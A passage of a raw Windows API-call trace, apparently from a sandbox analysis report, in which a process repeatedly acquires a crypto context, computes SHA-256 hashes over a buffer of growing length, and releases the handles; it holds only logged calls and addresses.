1 [0187.798] CryptHashData (hHash=0x3396ea90, pbData=0x32348160, dwDataLen=0x1c0, dwFlags=0x0) returned 1 [0187.798] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e89070 [0187.798] CryptDestroyHash (hHash=0x3396ea90) returned 1 [0187.798] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0187.799] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338227d0) returned 1 [0187.799] CryptCreateHash (in: hProv=0x338227d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.799] CryptHashData (hHash=0x3396f0b0, pbData=0x32348160, dwDataLen=0x1e0, dwFlags=0x0) returned 1 [0187.799] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e89430 [0187.799] CryptDestroyHash (hHash=0x3396f0b0) returned 1 [0187.799] CryptReleaseContext (hProv=0x338227d0, dwFlags=0x0) returned 1 [0187.799] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338238d0) returned 1 [0187.800] CryptCreateHash (in: hProv=0x338238d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.800] CryptHashData (hHash=0x3396f5f0, pbData=0x32348160, dwDataLen=0x200, dwFlags=0x0) returned 1 [0187.800] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e89670 [0187.800] CryptDestroyHash (hHash=0x3396f5f0) returned 1 [0187.800] CryptReleaseContext (hProv=0x338238d0, dwFlags=0x0) returned 1 [0187.800] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338220d0) returned 1 [0187.800] CryptCreateHash (in: hProv=0x338220d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.801] CryptHashData (hHash=0x3396f3c0, pbData=0x32348160, dwDataLen=0x220, dwFlags=0x0) returned 1 [0187.801] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e895b0 [0187.801] CryptDestroyHash (hHash=0x3396f3c0) returned 1 [0187.801] CryptReleaseContext (hProv=0x338220d0, dwFlags=0x0) returned 1 [0187.801] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33822ed0) returned 1 [0187.803] CryptCreateHash (in: hProv=0x33822ed0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.803] CryptHashData (hHash=0x3396f0b0, pbData=0x32348160, dwDataLen=0x240, dwFlags=0x0) returned 1 [0187.803] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e89460 [0187.803] CryptDestroyHash (hHash=0x3396f0b0) returned 1 [0187.803] CryptReleaseContext (hProv=0x33822ed0, dwFlags=0x0) returned 1 [0187.803] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338230d0) returned 1 [0187.804] CryptCreateHash (in: hProv=0x338230d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.804] CryptHashData (hHash=0x3396f580, pbData=0x32348160, dwDataLen=0x260, dwFlags=0x0) returned 1 [0187.804] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e88fe0 [0187.804] CryptDestroyHash (hHash=0x3396f580) returned 1 [0187.804] CryptReleaseContext (hProv=0x338230d0, dwFlags=0x0) returned 1 [0187.804] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338227d0) returned 1 [0187.805] CryptCreateHash (in: hProv=0x338227d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.805] CryptHashData (hHash=0x3396f580, pbData=0x32348160, dwDataLen=0x280, dwFlags=0x0) returned 1 [0187.805] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e89910 [0187.805] CryptDestroyHash (hHash=0x3396f580) returned 1 [0187.805] CryptReleaseContext (hProv=0x338227d0, dwFlags=0x0) returned 1 [0187.805] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33823bd0) returned 1 [0187.805] CryptCreateHash (in: hProv=0x33823bd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.805] CryptHashData (hHash=0x3396f6d0, pbData=0x32348160, dwDataLen=0x2a0, dwFlags=0x0) returned 1 [0187.805] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e89550 [0187.805] CryptDestroyHash (hHash=0x3396f6d0) returned 1 [0187.806] CryptReleaseContext (hProv=0x33823bd0, dwFlags=0x0) returned 1 [0187.806] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338225d0) returned 1 [0187.806] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.806] CryptHashData (hHash=0x3396f740, pbData=0x32348160, dwDataLen=0x2c0, dwFlags=0x0) returned 1 [0187.806] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e88f20 [0187.806] CryptDestroyHash (hHash=0x3396f740) returned 1 [0187.806] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0187.806] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33821dd0) returned 1 [0187.807] CryptCreateHash (in: hProv=0x33821dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.807] CryptHashData (hHash=0x3396f2e0, pbData=0x32348160, dwDataLen=0x2e0, dwFlags=0x0) returned 1 [0187.807] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e89a00 [0187.807] CryptDestroyHash (hHash=0x3396f2e0) returned 1 [0187.807] CryptReleaseContext (hProv=0x33821dd0, dwFlags=0x0) returned 1 [0187.807] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33821fd0) returned 1 [0187.807] CryptCreateHash (in: hProv=0x33821fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.807] CryptHashData (hHash=0x3396f200, pbData=0x32348160, dwDataLen=0x300, dwFlags=0x0) returned 1 [0187.808] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e89a60 [0187.808] CryptDestroyHash (hHash=0x3396f200) returned 1 [0187.808] CryptReleaseContext (hProv=0x33821fd0, dwFlags=0x0) returned 1 [0187.808] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33821fd0) returned 1 [0187.808] CryptCreateHash (in: hProv=0x33821fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.808] CryptHashData (hHash=0x3396f660, pbData=0x32348160, dwDataLen=0x320, dwFlags=0x0) returned 1 [0187.808] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e89940 [0187.808] CryptDestroyHash (hHash=0x3396f660) returned 1 [0187.808] CryptReleaseContext (hProv=0x33821fd0, dwFlags=0x0) returned 1 [0187.808] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33822fd0) returned 1 [0187.809] CryptCreateHash (in: hProv=0x33822fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.809] CryptHashData (hHash=0x3396f430, pbData=0x32348160, dwDataLen=0x340, dwFlags=0x0) returned 1 [0187.809] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e89970 [0187.809] CryptDestroyHash (hHash=0x3396f430) returned 1 [0187.809] CryptReleaseContext (hProv=0x33822fd0, dwFlags=0x0) returned 1 [0187.809] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338238d0) returned 1 [0187.810] CryptCreateHash (in: hProv=0x338238d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.810] CryptHashData (hHash=0x3396eb00, pbData=0x32348160, dwDataLen=0x360, dwFlags=0x0) returned 1 [0187.810] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e894c0 [0187.810] CryptDestroyHash (hHash=0x3396eb00) returned 1 [0187.810] CryptReleaseContext (hProv=0x338238d0, dwFlags=0x0) returned 1 [0187.810] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33822ed0) returned 1 [0187.810] CryptCreateHash (in: hProv=0x33822ed0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.810] CryptHashData (hHash=0x3396eef0, pbData=0x32348160, dwDataLen=0x380, dwFlags=0x0) returned 1 [0187.810] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e89220 [0187.810] CryptDestroyHash (hHash=0x3396eef0) returned 1 [0187.810] CryptReleaseContext (hProv=0x33822ed0, dwFlags=0x0) returned 1 [0187.810] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338239d0) returned 1 [0187.811] CryptCreateHash (in: hProv=0x338239d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.811] CryptHashData (hHash=0x3396eef0, pbData=0x32348160, dwDataLen=0x3a0, dwFlags=0x0) returned 1 [0187.811] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e89760 [0187.811] CryptDestroyHash (hHash=0x3396eef0) returned 1 [0187.811] CryptReleaseContext (hProv=0x338239d0, dwFlags=0x0) returned 1 [0187.811] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338223d0) returned 1 [0187.812] CryptCreateHash (in: hProv=0x338223d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.812] CryptHashData (hHash=0x3396eef0, pbData=0x32348160, dwDataLen=0x3c0, dwFlags=0x0) returned 1 [0187.812] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e89340 [0187.812] CryptDestroyHash (hHash=0x3396eef0) returned 1 [0187.812] CryptReleaseContext (hProv=0x338223d0, dwFlags=0x0) returned 1 [0187.812] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338232d0) returned 1 [0187.812] CryptCreateHash (in: hProv=0x338232d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.812] CryptHashData (hHash=0x3396f660, pbData=0x32348160, dwDataLen=0x3e0, dwFlags=0x0) returned 1 [0187.812] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e88ec0 [0187.812] CryptDestroyHash (hHash=0x3396f660) returned 1 [0187.812] CryptReleaseContext (hProv=0x338232d0, dwFlags=0x0) returned 1 [0187.812] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338226d0) returned 1 [0187.813] CryptCreateHash (in: hProv=0x338226d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.813] CryptHashData (hHash=0x3396f890, pbData=0x32348160, dwDataLen=0x400, dwFlags=0x0) returned 1 [0187.813] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e89370 [0187.813] CryptDestroyHash (hHash=0x3396f890) returned 1 [0187.813] CryptReleaseContext (hProv=0x338226d0, dwFlags=0x0) returned 1 [0187.813] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338237d0) returned 1 [0187.814] CryptCreateHash (in: hProv=0x338237d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.814] CryptHashData (hHash=0x3396efd0, pbData=0x32348160, dwDataLen=0x420, dwFlags=0x0) returned 1 [0187.814] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e89190 [0187.814] CryptDestroyHash (hHash=0x3396efd0) returned 1 [0187.814] CryptReleaseContext (hProv=0x338237d0, dwFlags=0x0) returned 1 [0187.814] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338222d0) returned 1 [0187.814] CryptCreateHash (in: hProv=0x338222d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.814] CryptHashData (hHash=0x3396f3c0, pbData=0x32348160, dwDataLen=0x440, dwFlags=0x0) returned 1 [0187.814] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e894f0 [0187.814] CryptDestroyHash (hHash=0x3396f3c0) returned 1 [0187.814] CryptReleaseContext (hProv=0x338222d0, dwFlags=0x0) returned 1 [0187.814] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33822fd0) returned 1 [0187.815] CryptCreateHash (in: hProv=0x33822fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.815] CryptHashData (hHash=0x3396f350, pbData=0x32348160, dwDataLen=0x460, dwFlags=0x0) returned 1 [0187.815] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e89100 [0187.815] CryptDestroyHash (hHash=0x3396f350) returned 1 [0187.815] CryptReleaseContext (hProv=0x33822fd0, dwFlags=0x0) returned 1 [0187.815] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33822ad0) returned 1 [0187.816] CryptCreateHash (in: hProv=0x33822ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.816] CryptHashData (hHash=0x3396f6d0, pbData=0x32348160, dwDataLen=0x480, dwFlags=0x0) returned 1 [0187.816] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e89520 [0187.816] CryptDestroyHash (hHash=0x3396f6d0) returned 1 [0187.816] CryptReleaseContext (hProv=0x33822ad0, dwFlags=0x0) returned 1 [0187.816] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338222d0) returned 1 [0187.816] CryptCreateHash (in: hProv=0x338222d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.816] CryptHashData (hHash=0x3396f890, pbData=0x32348160, dwDataLen=0x4a0, dwFlags=0x0) returned 1 [0187.816] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e895e0 [0187.816] CryptDestroyHash (hHash=0x3396f890) returned 1 [0187.816] CryptReleaseContext (hProv=0x338222d0, dwFlags=0x0) returned 1 [0187.816] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33822dd0) returned 1 [0187.817] CryptCreateHash (in: hProv=0x33822dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.817] CryptHashData (hHash=0x3396f270, pbData=0x32348160, dwDataLen=0x4c0, dwFlags=0x0) returned 1 [0187.817] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e89610 [0187.817] CryptDestroyHash (hHash=0x3396f270) returned 1 [0187.817] CryptReleaseContext (hProv=0x33822dd0, dwFlags=0x0) returned 1 [0187.817] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338238d0) returned 1 [0187.820] CryptCreateHash (in: hProv=0x338238d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.820] CryptHashData (hHash=0x3396ea90, pbData=0x32348160, dwDataLen=0x4e0, dwFlags=0x0) returned 1 [0187.820] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e899a0 [0187.820] CryptDestroyHash (hHash=0x3396ea90) returned 1 [0187.820] CryptReleaseContext (hProv=0x338238d0, dwFlags=0x0) returned 1 [0187.820] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338236d0) returned 1 [0187.821] CryptCreateHash (in: hProv=0x338236d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.821] CryptHashData (hHash=0x3396f580, pbData=0x32348160, dwDataLen=0x500, dwFlags=0x0) returned 1 [0187.821] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e892e0 [0187.821] CryptDestroyHash (hHash=0x3396f580) returned 1 [0187.821] CryptReleaseContext (hProv=0x338236d0, dwFlags=0x0) returned 1 [0187.821] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33822ed0) returned 1 [0187.848] CryptCreateHash (in: hProv=0x33822ed0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.848] CryptHashData (hHash=0x3396f2e0, pbData=0x32348160, dwDataLen=0x520, dwFlags=0x0) returned 1 [0187.848] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e89310 [0187.848] CryptDestroyHash (hHash=0x3396f2e0) returned 1 [0187.848] CryptReleaseContext (hProv=0x33822ed0, dwFlags=0x0) returned 1 [0187.849] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33823ad0) returned 1 [0187.849] CryptCreateHash (in: hProv=0x33823ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.849] CryptHashData (hHash=0x3396eef0, pbData=0x32348160, dwDataLen=0x540, dwFlags=0x0) returned 1 [0187.851] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e891f0 [0187.851] CryptDestroyHash (hHash=0x3396eef0) returned 1 [0187.851] CryptReleaseContext (hProv=0x33823ad0, dwFlags=0x0) returned 1 [0187.851] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338222d0) returned 1 [0187.852] CryptCreateHash (in: hProv=0x338222d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.852] CryptHashData (hHash=0x3396ec50, pbData=0x32348160, dwDataLen=0x560, dwFlags=0x0) returned 1 [0187.852] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e89640 [0187.852] CryptDestroyHash (hHash=0x3396ec50) returned 1 [0187.852] CryptReleaseContext (hProv=0x338222d0, dwFlags=0x0) returned 1 [0187.852] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338230d0) returned 1 [0187.853] CryptCreateHash (in: hProv=0x338230d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.853] CryptHashData (hHash=0x3396f3c0, pbData=0x32348160, dwDataLen=0x580, dwFlags=0x0) returned 1 [0187.853] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e89010 [0187.853] CryptDestroyHash (hHash=0x3396f3c0) returned 1 [0187.853] CryptReleaseContext (hProv=0x338230d0, dwFlags=0x0) returned 1 [0187.853] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338236d0) returned 1 [0187.853] CryptCreateHash (in: hProv=0x338236d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.853] CryptHashData (hHash=0x3396eef0, pbData=0x32348160, dwDataLen=0x5a0, dwFlags=0x0) returned 1 [0187.853] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e89040 [0187.853] CryptDestroyHash (hHash=0x3396eef0) returned 1 [0187.853] CryptReleaseContext (hProv=0x338236d0, dwFlags=0x0) returned 1 [0187.853] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338238d0) returned 1 [0187.854] CryptCreateHash (in: hProv=0x338238d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.854] CryptHashData (hHash=0x3396f900, pbData=0x32348160, dwDataLen=0x5c0, dwFlags=0x0) returned 1 [0187.854] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e890a0 [0187.854] CryptDestroyHash (hHash=0x3396f900) returned 1 [0187.854] CryptReleaseContext (hProv=0x338238d0, dwFlags=0x0) returned 1 [0187.854] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338220d0) returned 1 [0187.855] CryptCreateHash (in: hProv=0x338220d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.855] CryptHashData (hHash=0x3396f120, pbData=0x32348160, dwDataLen=0x5e0, dwFlags=0x0) returned 1 [0187.855] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e89730 [0187.855] CryptDestroyHash (hHash=0x3396f120) returned 1 [0187.855] CryptReleaseContext (hProv=0x338220d0, dwFlags=0x0) returned 1 [0187.855] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338227d0) returned 1 [0187.855] CryptCreateHash (in: hProv=0x338227d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.855] CryptHashData (hHash=0x3396f0b0, pbData=0x32348160, dwDataLen=0x600, dwFlags=0x0) returned 1 [0187.855] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e89130 [0187.855] CryptDestroyHash (hHash=0x3396f0b0) returned 1 [0187.855] CryptReleaseContext (hProv=0x338227d0, dwFlags=0x0) returned 1 [0187.855] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338229d0) returned 1 [0187.856] CryptCreateHash (in: hProv=0x338229d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.856] CryptHashData (hHash=0x3396f350, pbData=0x32348160, dwDataLen=0x620, dwFlags=0x0) returned 1 [0187.856] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e89160 [0187.856] CryptDestroyHash (hHash=0x3396f350) returned 1 [0187.856] CryptReleaseContext (hProv=0x338229d0, dwFlags=0x0) returned 1 [0187.856] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338229d0) returned 1 [0187.857] CryptCreateHash (in: hProv=0x338229d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.857] CryptHashData (hHash=0x3396eda0, pbData=0x32348160, dwDataLen=0x640, dwFlags=0x0) returned 1 [0187.857] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e892b0 [0187.857] CryptDestroyHash (hHash=0x3396eda0) returned 1 [0187.857] CryptReleaseContext (hProv=0x338229d0, dwFlags=0x0) returned 1 [0187.857] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338230d0) returned 1 [0187.857] CryptCreateHash (in: hProv=0x338230d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.857] CryptHashData (hHash=0x3396f900, pbData=0x32348160, dwDataLen=0x660, dwFlags=0x0) returned 1 [0187.857] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e890d0 [0187.857] CryptDestroyHash (hHash=0x3396f900) returned 1 [0187.857] CryptReleaseContext (hProv=0x338230d0, dwFlags=0x0) returned 1 [0187.857] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338222d0) returned 1 [0187.858] CryptCreateHash (in: hProv=0x338222d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.858] CryptHashData (hHash=0x3396f2e0, pbData=0x32348160, dwDataLen=0x680, dwFlags=0x0) returned 1 [0187.858] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e89250 [0187.858] CryptDestroyHash (hHash=0x3396f2e0) returned 1 [0187.858] CryptReleaseContext (hProv=0x338222d0, dwFlags=0x0) returned 1 [0187.858] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33822bd0) returned 1 [0187.859] CryptCreateHash (in: hProv=0x33822bd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.859] CryptHashData (hHash=0x3396f740, pbData=0x32348160, dwDataLen=0x6a0, dwFlags=0x0) returned 1 [0187.859] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e897c0 [0187.859] CryptDestroyHash (hHash=0x3396f740) returned 1 [0187.859] CryptReleaseContext (hProv=0x33822bd0, dwFlags=0x0) returned 1 [0187.859] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33822ad0) returned 1 [0187.859] CryptCreateHash (in: hProv=0x33822ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.859] CryptHashData (hHash=0x3396f660, pbData=0x32348160, dwDataLen=0x6c0, dwFlags=0x0) returned 1 [0187.859] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e897f0 [0187.859] CryptDestroyHash (hHash=0x3396f660) returned 1 [0187.859] CryptReleaseContext (hProv=0x33822ad0, dwFlags=0x0) returned 1 [0187.859] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: 